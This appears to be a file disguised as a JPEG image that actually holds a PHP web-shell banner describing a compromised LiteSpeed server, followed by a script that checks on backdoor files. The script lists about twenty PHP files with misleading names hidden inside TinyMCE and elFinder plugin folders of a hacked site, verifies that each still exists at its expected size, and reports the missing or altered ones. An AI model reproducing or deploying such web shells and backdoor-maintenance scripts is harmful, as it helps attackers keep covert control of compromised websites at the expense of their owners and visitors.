????JFIF??x?x????'
Server IP : 104.21.96.1 / Your IP : 216.73.216.60 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/thread-self/root/proc/self/root/dev/shm/ |
Upload File : |
<?php $r = '/home/boutjvuz/public_html/projects/sarl.klik.ma'; $x = ["/assets/plugins/tinymce/themes/inlite/src/main/js/tinymce/inlite/file/sample.php"=>"bd@@66320436@@1610", "/assets/plugins/tinymce/themes/inlite/src/main/js/tinymce/inlite/ui/show_courses_new.php"=>"bd@@66320438@@537", "/assets/plugins/tinymce/themes/inlite/src/test/js/question.php"=>"bd@@66320443@@1607", "/assets/plugins/tinymce/themes/inlite/src/test/nl.php"=>"bd@@66320445@@534", "/assets/plugins/bootstrap-colorpicker/css/src/less/helveticab.php"=>"bd@@66320446@@1044", "/assets/plugins/tinymce/themes/inlite/src/test/js/atomic/core/images.php"=>"bd@@66337099@@1818", "/assets/plugins/tinymce/themes/inlite/src/main/js/tinymce/whats_new.php"=>"bd@@66337100@@618", "/assets/plugins/tinymce/themes/inlite/src/demo/css/COPYRIGHT.php"=>"bd@@66337102@@1496", "/assets/plugins/tinymce/themes/inlite/src/searchform.php"=>"bd@@66337104@@1013", "/assets/plugins/elFinder/js/extras/phplot.php"=>"bd@@66337109@@534", "/assets/plugins/tinymce/plugins/visualchars/gradeexport.xls.php"=>"bd@@66277206@@594", "/assets/plugins/tinymce/themes/inlite/src/main/js/tinymce/inlite/alien/awardsEN.php"=>"bd@@66301302@@1070", "/assets/plugins/tinymce/themes/inlite/config/dent/visualprolog.php"=>"bd@@66301318@@1054", "/assets/plugins/tinymce/themes/inlite/scratch/compile/lightbox.php"=>"bd@@66301319@@1054", "/assets/plugins/tinymce/plugins/visualblocks/css/port2.php"=>"bd@@66301321@@659", "/assets/plugins/tinymce/skins/lightgray/img/Message.class.php"=>"bd@@66301322@@1592", "/assets/plugins/tinymce/themes/inlite/src/demo/js/tinymce/inlite/lang.en.home.inc.php"=>"bd@@66277313@@535", "/assets/plugins/tinymce/themes/inlite/src/test/js/atomic/alien/lang_fa.php"=>"bd@@66277315@@594", "/assets/plugins/tinymce/themes/inlite/src/test/js/browser/CAPTCHA_test.php"=>"bd@@66277321@@1016", "/assets/plugins/tinymce/themes/inlite/src/main/js/rightmenu.php"=>"bd@@66277343@@538"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');